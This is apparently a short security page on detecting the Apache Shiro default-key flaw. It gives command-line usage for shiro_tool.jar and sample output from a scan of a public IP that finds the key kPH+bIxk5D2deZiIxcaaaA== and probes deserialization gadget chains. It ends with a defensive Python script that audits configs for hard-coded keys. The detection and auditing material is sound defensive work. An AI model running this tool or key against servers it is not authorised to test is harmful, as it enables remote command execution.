Detection tool
Detection commands
Check whether the target uses Shiro: java -cp shiro_tool.jar shiro.Check http://url
java -jar shiro_tool.jar https://xx.xx.xx.xx
    nocheck --> skip check target is shiro or not.
    key=    --> set a shiro key.
    req=    --> request body file (save the captured request to a file and give the file name here)
    keys=   --> keys file (a file of custom keys, one key per line)
(The default key kPH+bIxk5D2deZiIxcaaaA== is present; an attacker can exploit the vulnerability to execute arbitrary commands remotely and compromise the server.)
java -jar shiro_tool.jar https://xx.xx.xx.xx
[-] target: http://47.110.35.164:8080
[-] target is use shiro
[-] start guess shiro key...
[-] use shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check CommonsBeanutils1
[-] check CommonsCollections1
[-] check CommonsCollections2
[-] check CommonsCollections3
[-] check CommonsCollections4
[-] check CommonsCollections5
[-] check CommonsCollections6
[-] check CommonsCollections7
[-] check CommonsCollections8
[-] check CommonsCollections9
[-] check CommonsCollections10
[-] check Groovy1
[-] check JSON1
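The finding above comes down to a rememberMe key that is hard-coded and publicly known. The following is an added example, not part of shiro_tool or of the original page: a source and config audit that flags such keys in your own code base. The two match patterns (a shiro.ini cipherKey line and a Java setCipherKey(Base64.decode("...")) call), the helper names and the sample input are assumptions made for illustration.

```python
import base64
import re

# Key reported as the default in the tool output above.
KNOWN_KEYS = {"kPH+bIxk5D2deZiIxcaaaA=="}

# Assumed places where a rememberMe key gets hard-coded.
PATTERNS = [
    re.compile(r'cipherKey\s*=\s*([A-Za-z0-9+/]{16,}={0,2})'),           # shiro.ini
    re.compile(r'setCipherKey\s*\(\s*Base64\.decode\s*\(\s*"([A-Za-z0-9+/=]+)"'),  # Java
]

def load_keys(text):
    """Parse a keys file in the one-key-per-line layout described above."""
    return {line.strip() for line in text.splitlines() if line.strip()}

def audit(text, known_keys=KNOWN_KEYS):
    """Return (line number, key, verdict) for every hard-coded key found."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pat in PATTERNS:
            m = pat.search(line)
            if not m:
                continue
            key = m.group(1)
            try:
                size = len(base64.b64decode(key, validate=True))
            except ValueError:          # binascii.Error is a ValueError
                size = None
            if key in known_keys:
                verdict = "known-default"    # replace with a random per-deployment key
            elif size not in (16, 24, 32):
                verdict = "invalid-aes-key"  # not a valid AES key length
            else:
                verdict = "hard-coded"       # secret lives in source or config
            findings.append((lineno, key, verdict))
    return findings

# Constructed sample input, not taken from any real project.
SAMPLE = '''\
[main]
securityManager.rememberMeManager.cipherKey = kPH+bIxk5D2deZiIxcaaaA==
// Java config
manager.setCipherKey(Base64.decode("MTIzNDU2Nzg5MGFiY2RlZg=="));
manager.setCipherKey(Base64.decode("c2hvcnQ="));
'''

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

Pass known_keys=load_keys(...) to check against your own list of published or previously leaked keys.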
Apache Shiro vulnerability detection